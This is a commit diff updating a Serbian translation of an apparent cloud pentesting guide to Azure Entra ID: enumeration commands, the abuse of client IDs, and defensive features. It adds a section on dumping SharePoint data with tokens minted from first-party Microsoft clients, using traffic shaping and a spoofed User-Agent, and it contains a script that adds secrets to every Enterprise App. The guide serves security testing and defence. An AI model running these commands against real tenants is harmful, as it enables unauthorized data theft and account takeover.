Translated ['', 'src/pentesting-cloud/azure-security/az-services/az-azur

This commit is contained in:
Translator
2026-02-12 12:18:15 +00:00
parent ceab0e04da
commit ea86fc44ce
@@ -4,9 +4,9 @@
## Osnovne informacije
Azure Active Directory (Azure AD) služi kao Microsoftova usluga zasnovana na oblaku za upravljanje identitetom i pristupom. Ona je ključna za omogućavanje zaposlenima da se prijave i dobiju pristup resursima, kako unutar tako i van organizacije, uključujući Microsoft 365, Azure portal i brojne druge SaaS aplikacije. Dizajn Azure AD se fokusira na pružanje osnovnih usluga identiteta, posebno uključujući **autentifikaciju, autorizaciju i upravljanje korisnicima**.
Azure Active Directory (Azure AD) je Microsoft-ova usluga zasnovana na oblaku za upravljanje identitetima i pristupom. Omogućava zaposlenima prijavu i pristup resursima, kako unutar, tako i izvan organizacije, uključujući Microsoft 365, Azure portal i mnoge druge SaaS aplikacije. Dizajn Azure AD-a fokusira se na pružanje ključnih usluga identiteta, posebno **authentication, authorization, and user management**.
Ključne karakteristike Azure AD uključuju **višefaktorsku autentifikaciju** i **uslovni pristup**, uz besprekornu integraciju sa drugim Microsoftovim bezbednosnim uslugama. Ove karakteristike značajno povećavaju bezbednost identiteta korisnika i omogućavaju organizacijama da efikasno implementiraju i sprovode svoje politike pristupa. Kao osnovna komponenta Microsoftovog ekosistema usluga u oblaku, Azure AD je ključan za upravljanje identitetima korisnika zasnovano na oblaku.
Ključne funkcionalnosti Azure AD uključuju **multi-factor authentication** i **conditional access**, uz integraciju sa drugim Microsoft security services. Ove karakteristike značajno pojačavaju bezbednost korisničkih identiteta i omogućavaju organizacijama da efikasno implementiraju i sprovode svoje politike pristupa. Kao osnovna komponenta ekosistema Microsoftovih cloud usluga, Azure AD je ključan za upravljanje korisničkim identitetima u oblaku.
## Enumeracija
@@ -96,6 +96,7 @@ Connect-AzAccount -Credential $creds
# Connect with access token
Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken]
# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token)
# Connect with Service principal/enterprise app secret
$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force
@@ -184,11 +185,11 @@ Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token
{{#endtab }}
{{#endtabs }}
Kada se **prijavite** putem **CLI** u Azure sa bilo kojim programom, koristite **Azure aplikaciju** iz **tenanta** koji pripada **Microsoftu**. Ove aplikacije, poput onih koje možete kreirati u svom nalogu, **imaju klijent ID**. **Nećete moći da vidite sve njih** u **listama dozvoljenih aplikacija** koje možete videti u konzoli, **ali su podrazumevano dozvoljene**.
Kada se **login** putem **CLI** u **Azure** iz bilo kog programa, koristite **Azure Application** iz **tenant**-a koji pripada **Microsoft**. Te Applications, kao i one koje možete kreirati na svom nalogu, **have a client id**. Nećete moći da vidite sve od njih u **allowed applications lists** koje vidite u konzoli, **but they are allowed by default**.
Na primer, **powershell skripta** koja **autentifikuje** koristi aplikaciju sa klijent ID **`1950a258-227b-4e31-a9cf-717495945fc2`**. Čak i ako aplikacija ne pojavljuje u konzoli, sysadmin može **blokirati tu aplikaciju** tako da korisnici ne mogu pristupiti koristeći alate koji se povezuju putem te aplikacije.
Na primer, **powershell script** koji se **authenticates** koristi aplikaciju sa client id **`1950a258-227b-4e31-a9cf-717495945fc2`**. Čak i ako aplikacija ne pojavljuje se u konzoli, sysadmin može **block that application** tako da korisnici ne mogu pristupiti koristeći alate koji se povezuju preko te App.
Međutim, postoje **drugi klijent-IDs** aplikacija koje **će vam omogućiti da se povežete na Azure**:
Međutim, postoje **other client-ids** aplikacija koje **will allow you to connect to Azure**:
```bash
# The important part is the ClientId, which identifies the application to login inside Azure
@@ -213,7 +214,7 @@ $token = Invoke-Authorize -Credential $credential `
-Verbose -Debug `
-InformationAction Continue
```
### Tenants
### Tenanti
{{#tabs }}
{{#tab name="az cli" }}
@@ -226,7 +227,7 @@ az account tenant list
### Korisnici
Za više informacija o Entra ID korisnicima pogledajte:
Za više informacija o korisnicima Entra ID-a pogledajte:
{{#ref}}
../az-basic-information/
@@ -365,15 +366,15 @@ $password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText
```
### MFA & Conditional Access Policies
Preporučuje se da se doda MFA za svakog korisnika, međutim, neke kompanije to neće postaviti ili će možda postaviti uz Conditional Access: Korisnik će biti **required MFA if** se prijavi sa određene lokacije, pretraživača ili **some condition**. Ove politike, ako nisu pravilno konfigurisane, mogu biti podložne **bypasses**. Proverite:
Preporučuje se da se MFA doda svakom korisniku, međutim, neke kompanije to neće postaviti ili će ga postaviti putem Conditional Access: korisniku će biti **zahtevan MFA ako** se prijavi sa određene lokacije, iz pregledača ili pod **nekim uslovom**. Ove politike, ako nisu pravilno konfigurisane, mogu biti podložne **bypasses**. Proverite:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
{{#endref}}
### Groups
### Grupe
Za više informacija o Entra ID grupama proverite:
Za više informacija o Entra ID grupama pogledajte:
{{#ref}}
../az-basic-information/
@@ -487,16 +488,16 @@ Vlasnici grupe mogu dodavati nove korisnike u grupu
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```
> [!WARNING]
> Grupe mogu biti dinamične, što u suštini znači da **ako korisnik ispunjava određene uslove, biće dodat u grupu**. Naravno, ako su uslovi zasnovani na **atributima** koje **korisnik** može **kontrolisati**, mogao bi zloupotrebiti ovu funkciju da **uđe u druge grupe**.\
> Proverite kako zloupotrebiti dinamične grupe na sledećoj stranici:
> Grupe mogu biti dinamičke, što u suštini znači da **ako korisnik ispuni određene uslove biće dodat u grupu**. Naravno, ako su uslovi zasnovani na **atributima** koje **korisnik** može **kontrolisati**, on može zloupotrebiti ovu funkciju da **se ubaci u druge grupe**.\
> Pogledajte kako zloupotrebiti dynamic groups na sledećoj stranici:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
{{#endref}}
### Service Principals
### Servisni principali
Za više informacija o Entra ID servisnim principalima proverite:
Za više informacija o Entra ID servisnim principalima pogledajte:
{{#ref}}
../az-basic-information/
@@ -597,11 +598,11 @@ Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembersh
{{#endtabs }}
> [!WARNING]
> Vlasnik Service Principal-a može promeniti svoju lozinku.
> Owner Service Principal-a može promeniti njegovu lozinku.
<details>
<summary>Lista i pokušaj dodavanja klijentske tajne na svaku Enterprise App</summary>
<summary>Navedite i pokušajte da dodate client secret na svaki Enterprise App</summary>
```bash
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
@@ -708,16 +709,16 @@ Write-Output "Failed to Enumerate the Applications."
### Aplikacije
Za više informacija o Aplikacijama proverite:
Za više informacija o aplikacijama pogledajte:
{{#ref}}
../az-basic-information/
{{#endref}}
Kada se aplikacija generiše, dodeljuju se 2 tipa dozvola:
Kada se App kreira, dodeljuju se 2 tipa dozvola:
- **Dozvole** dodeljene **Servisnom Principalu**
- **Dozvole** koje **aplikacija** može imati i koristiti **u ime korisnika**.
- **Dozvole** dodeljene **Service Principal**-u
- **Dozvole** koje **app** može imati i koristiti **u ime korisnika**.
{{#tabs }}
{{#tab name="az cli" }}
@@ -742,6 +743,33 @@ az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92
# Get Cloud Applications Administrators (full access over apps)
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members"
# Get "API Permissions" of an App
## Get the ResourceAppId
az ad app show --id "<app-id>" --query "requiredResourceAccess" --output json
## e.g.
[
{
"resourceAccess": [
{
"id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
"type": "Scope"
},
{
"id": "d07a8cc0-3d51-4b77-b3b0-32704d1f69fa",
"type": "Role"
}
],
"resourceAppId": "00000003-0000-0000-c000-000000000000"
}
]
## For the perms of type "Scope"
az ad sp show --id <ResourceAppId> --query "oauth2PermissionScopes[?id=='<id>'].value" -o tsv
az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2PermissionScopes[?id=='e1fe6dd8-ba31-4d61-89e7-88639da4683d'].value" -o tsv
## For the perms of type "Role"
az ad sp show --id <ResourceAppId> --query "appRoles[?id=='<id>'].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv
```
{{#endtab }}
@@ -792,21 +820,21 @@ Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *
{{#endtabs }}
> [!WARNING]
> Aplikacija sa dozvolom **`AppRoleAssignment.ReadWrite`** može **povećati privilegije na Global Admin** dodeljujući sebi tu ulogu.\
> Za više informacija [**proverite ovo**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
> Aplikacija sa dozvolom **`AppRoleAssignment.ReadWrite`** može **eskalirati na Global Admin** dodeljivanjem sebi te uloge.\
> For more information [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
> [!NOTE]
> Tajni niz koji aplikacija koristi da dokaže svoj identitet prilikom traženja tokena je lozinka aplikacije.\
> Dakle, ako pronađete ovu **lozinku**, možete pristupiti kao **service principal** **unutar** **tenanta**.\
> Imajte na umu da je ova lozinka vidljiva samo kada je generisana (možete je promeniti, ali je ne možete ponovo dobiti).\
> **Vlasnik** **aplikacije** može **dodati lozinku** (tako da može da se pretvara da je ona).\
> Prijave kao ovi service principals **nisu označene kao rizične** i **neće imati MFA.**
> Tajni niz koji aplikacija koristi da dokaže svoj identitet pri zahtevanju tokena je lozinka aplikacije.\
> Dakle, ako pronađete ovu **lozinku** možete pristupiti kao **service principal** **inside** **the tenant**.\
> Imajte na umu da je ova lozinka vidljiva samo kada se generiše (možete je promeniti ali je ne možete ponovo dobiti).\
> **Owner** **of** the **application** može **add a password** to it (so he can impersonate it).\
> Logins as these service principals are **not marked as risky** and they **won't have MFA.**
Moguće je pronaći listu često korišćenih App ID-ova koji pripadaju Microsoft-u na [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
### Managed Identities
### Upravljani identiteti
Za više informacija o Managed Identities proverite:
For more information about Managed Identities check:
{{#ref}}
../az-basic-information/
@@ -909,9 +937,9 @@ Headers = @{
{{#endtab }}
{{#endtabs }}
### Entra ID Uloge
### Uloge Entra ID-a
Za više informacija o Azure ulogama proverite:
Za više informacija o Azure ulogama pogledajte:
{{#ref}}
../az-basic-information/
@@ -1032,8 +1060,8 @@ Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember
{{#endtabs }}
> [!WARNING]
> Ako je uređaj (VM) **AzureAD povezan**, korisnici iz AzureAD će moći da se **prijave**.\
> Štaviše, ako je prijavljeni korisnik **Vlasnik** uređaja, on će biti **lokalni administrator**.
> Ako je uređaj (VM) **AzureAD joined**, korisnici iz AzureAD će moći da se **prijave**.\
> Štaviše, ako je prijavljeni korisnik **Owner** uređaja, on će biti **lokalni administrator**.
### Administrativne jedinice
@@ -1072,74 +1100,123 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
{{#endtab }}
{{#endtabs }}
## Entra ID Eskalacija Privilegija
## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper)
Napadači sa **delegated Microsoft Graph token** koji uključuje **`Sites.Read.All`** ili **`Sites.ReadWrite.All`** mogu da enumerišu **sites/drives/items** preko Graph-a i zatim da povuku sadržaj fajlova preko **SharePoint pre-authentication download URLs** (time-limited URLs koji ugrađuju access token). Skripta [SharePointDumper](https://github.com/zh54321/SharePointDumper) automatizuje ceo tok (enumeration → pre-auth downloads) i emituje telemetriju po zahtevu za testiranje detekcije.
### Obtaining usable delegated tokens
- SharePointDumper itself **does not authenticate**; supply an access token (optionally refresh token).
- Pre-consented **first-party clients** can be abused to mint a Graph token without registering an app. Example `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) invocations:
```powershell
# CAE requested by default; yields long-lived (~24h) access token
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob' # OneDrive (FOCI TRUE)
# Other pre-consented clients
Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient' # Teams (FOCI TRUE)
Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint' # SharePoint (FOCI TRUE)
Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE)
Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE)
```
> [!NOTE]
> FOCI TRUE klijenti podržavaju refresh across devices; FOCI FALSE klijenti često zahtevaju `-Origin` da bi zadovoljili validaciju porekla reply URL-a.
### Pokretanje SharePointDumper za enumeration + exfiltration
- Osnovni dump sa custom UA / proxy / throttling:
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080'
```
- Kontrola opsega: uključivanje/isključivanje sajtova ili ekstenzija i globalna ograničenja:
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100
```
- **Nastavi** prekinuta izvršavanja (ponovo nabraja ali preskače preuzete stavke):
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant
```
- **Automatsko osvežavanje tokena pri HTTP 401** (zahteva da je EntraTokenAid učitan):
```powershell
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74'
```
Operativne beleške:
- Preferira **CAE-enabled** tokene da bi se izbeglo istekanje tokom izvršavanja; pokušaji osvežavanja **nisu** logovani u API logu alata.
- Generiše **CSV/JSON request logs** za **Graph + SharePoint** i podrazumevano cenzuriše ugrađene SharePoint download tokene (moguće uključiti/isključiti).
- Podržava **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, i **Ctrl+C-safe shutdown** za oblikovanje saobraćaja tokom detection/IR testova.
## Entra ID Privilege Escalation
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/
{{#endref}}
## Azure Eskalacija Privilegija
## Azure Privilege Escalation
{{#ref}}
../az-privilege-escalation/az-authorization-privesc.md
{{#endref}}
## Odbrambeni Mehanizmi
## Odbrambeni mehanizmi
### Upravljanje Privilegovanim Identitetima (PIM)
### Privileged Identity Management (PIM)
Upravljanje Privilegovanim Identitetima (PIM) u Azure pomaže da se **spreči dodeljivanje prekomernih privilegija** korisnicima nepotrebno.
Privileged Identity Management (PIM) u Azure pomaže da se **spreči dodela prekomernih privilegija** korisnicima bez potrebe.
Jedna od glavnih funkcija koju PIM pruža je da omogućava da se ne dodeljuju uloge principima koji su konstantno aktivni, već da ih učini **prikladnim na određeni vremenski period (npr. 6 meseci)**. Tada, kada korisnik želi da aktivira tu ulogu, mora da je zatraži navodeći vreme koje mu je potrebno za privilegiju (npr. 3 sata). Tada **administrator mora da odobri** zahtev.\
Napomena: korisnik će takođe moći da zatraži da se **prolongira** vreme.
Jedna od glavnih funkcionalnosti koje PIM pruža je što omogućava da se uloge ne dodeljuju principalima koji su stalno aktivni, već da ih učini **eligible za određeni vremenski period (npr. 6 meseci)**. Zatim, kad god korisnik želi da aktivira tu ulogu, mora da zatraži nju i navede vreme koliko mu treba privilegija (npr. 3 sata). Nakon toga **administratorska osoba mora da odobri** zahtev.\
Napomena: korisnik takođe može da zatraži i **produženje** vremena.
Pored toga, **PIM šalje emailove** svaki put kada se privilegovana uloga dodeljuje nekome.
Pored toga, **PIM šalje mejlove** kad god se privilegovana uloga dodeli nekom korisniku.
<figure><img src="../../../images/image (354).png" alt=""><figcaption></figcaption></figure>
Kada je PIM omogućen, moguće je konfigurisati svaku ulogu sa određenim zahtevima kao što su:
Kada je PIM omogućen moguće je konfigurisati svaku ulogu sa određenim zahtevima kao što su:
- Maksimalno trajanje (sati) aktivacije
- Zahteva MFA prilikom aktivacije
- Zahteva kontekst autentifikacije uslovnog pristupa
- Zahteva opravdanje prilikom aktivacije
- Zahteva informacije o tiketu prilikom aktivacije
- Zahteva odobrenje za aktivaciju
- Maksimalno vreme za isteknuće prikladnih dodela
- Puno više konfiguracije o tome kada i kome slati obaveštenja kada se određene radnje dogode sa tom ulogom
- Require MFA on activation
- Require Conditional Access authentication context
- Require justification on activation
- Require ticket information on activation
- Require approval to activate
- Max time to expire the elegible assignments
- Mnogo više opcija za konfigurisanje kada i kome se šalju obaveštenja kad se dogode određene akcije vezane za tu ulogu
### Politike Uslovnog Pristupa
### Conditional Access Policies
Proverite:
Check:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
{{#endref}}
### Entra Zaštita Identiteta
### Entra Identity Protection
Entra Zaštita Identiteta je bezbednosna usluga koja omogućava da se **otkrije kada je korisnik ili prijavljivanje previše rizično** da bi bilo prihvaćeno, omogućavajući da se **blokira** korisnik ili pokušaj prijavljivanja.
Entra Identity Protection je bezbednosna usluga koja omogućava da se **otkrije kada je korisnik ili prijava previše rizična** da bi bila prihvaćena, omogućavajući da se **blokira** korisnik ili pokušaj prijave.
Omogućava administratoru da je konfiguriše da **blokira** pokušaje kada je rizik "Nizak i iznad", "Srednji i iznad" ili "Visok". Iako, po defaultu je potpuno **onemogućena**:
Omogućava administratoru da je konfiguriše da **blokira** pokušaje kada je rizik "Low and above", "Medium and above" ili "High". Ipak, podrazumevano je potpuno **onemogućena**:
<figure><img src="../../../images/image (356).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Danas se preporučuje dodavanje ovih ograničenja putem politika uslovnog pristupa gde je moguće konfigurisati iste opcije.
> Danas se preporučuje dodavanje ovih ograničenja putem Conditional Access politika gde je moguće konfigurisati iste opcije.
### Entra Zaštita Lozinki
### Entra Password Protection
Entra Zaštita Lozinki ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) je bezbednosna funkcija koja **pomaže u sprečavanju zloupotrebe slabih lozinki tako što zaključava naloge kada se dogodi nekoliko neuspešnih pokušaja prijavljivanja**.\
Takođe omogućava da se **zabranjuje prilagođena lista lozinki** koju treba da obezbedite.
Entra Password Protection ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) je bezbednosna funkcionalnost koja **pomaže da se spreči zloupotreba slabih lozinki tako što zaključava naloge kada se dogodi više neuspešnih pokušaja prijave**.\
Takođe omogućava da se **zabranjuje prilagođena lista lozinki** koju morate dostaviti.
Može se **primeniti i** na nivou oblaka i na lokalnom Active Directory-ju.
Može se **primeniti i u cloud-u i na on-premises Active Directory**.
Podrazumevani režim je **Revizija**:
Podrazumevani režim je **Audit**:
<figure><img src="../../../images/image (355).png" alt=""><figcaption></figcaption></figure>
## Reference
## References
- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
- [SharePointDumper](https://github.com/zh54321/SharePointDumper)
- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)
{{#include ../../../banners/hacktricks-training.md}}